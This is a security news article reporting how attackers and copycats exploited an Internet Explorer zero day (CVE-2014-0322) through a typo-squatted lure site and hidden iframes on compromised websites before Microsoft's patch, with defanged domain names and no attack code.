Hackers Milk IE Zero Day Before Patch

Attackers have increased their exploitation of an Internet Explorer zero day vulnerability (CVE-2014-0322) set to be fixed by Microsoft in its regularly scheduled patch Tuesday release later this afternoon.

In addition to the two websites listed above, Websense reports that three others have been targeted using the same bug: hatobus[dot]co[dot]jp, a Japanese travel site hosted in Tokyo; english[dot]com[dot]tw, the site of a Taiwanese English school hosted in San Antonio, Texas; and chemistry[dot]hku[dot]hk, a Hong Kong University Chemistry Department website hosted in Hong Kong.

It all began with a typo-squatted variety of giffo[dot]asso[dot]fr, the website of the French aerospace company. The attackers set up giffo[dot]assso[dot]net and hosted a malicious iframe there that led to another part of the same domain where the exploit was actually located.

Once this attack began garnering media attention, other criminals began copying it, deploying the same code on different lure sites with different payloads.

In the case of Hatobus, the popular Japanese travel site, attackers buried the redirecting iframe in some javascript files on the site. The exploit too was hosted on the site, which makes it all the more inconspicuous since shady redirects are a generally a dead giveaway for protective software. The exploit code in this case, according to Websense, was nearly identical to that used in the first attack. The only real difference is that the attackers piggybacked a second, Java exploit, which aimed to install a banking trojan targeting members of a popular Japanese bank. Unlike earlier, targeted attacks, the Hatobus variety sought to infect as many machines as possible.

Both other attacks were essentially copycats as well. Interestingly, in the case of the Taiwanese English school, the exploit was rather flagrantly hosted on the homepage of that website. The Hong Kong University Chemistry Department attack deployed redirecting iframes similar to those in the other incidents.

“It’s evident that the repercussions of exploit code of an unpatched vulnerability that found its way to the public domain can have quite an impact; exploit code that has been crafted for a targeted attack is virtually later on copied and used to drop crimeware binaries,” wrote Websense’s Elad Sharf. “We could see that the exploit code for CVE-2014-0322 was encompassed and served in a variety of ways as it “evolved” in scale: starting from being utilized on a cybersquatted lure website used in a low-volume and selected “under the radar” targeted attacks to being served through hidden iframes and exploit code that was directly placed on compromised websites with the ultimate aim to impact as many browsing users as possible with crimeware.”

About Brian Donohue

“We are what we pretend to be, so we must be careful about what we pretend to be.” ― Kurt Vonnegut

In the second quarter of 2015 Kaspersky Lab solutions detected and repelled a total of 379,972,834 malicious attacks from online resources. There were 5,903,377 registered notifications about attempte...

Innovative technologies are conquering the financial market, opening up new opportunities for startups. The volume of investment in projects for the banking sector is constantly growing, as is its pot...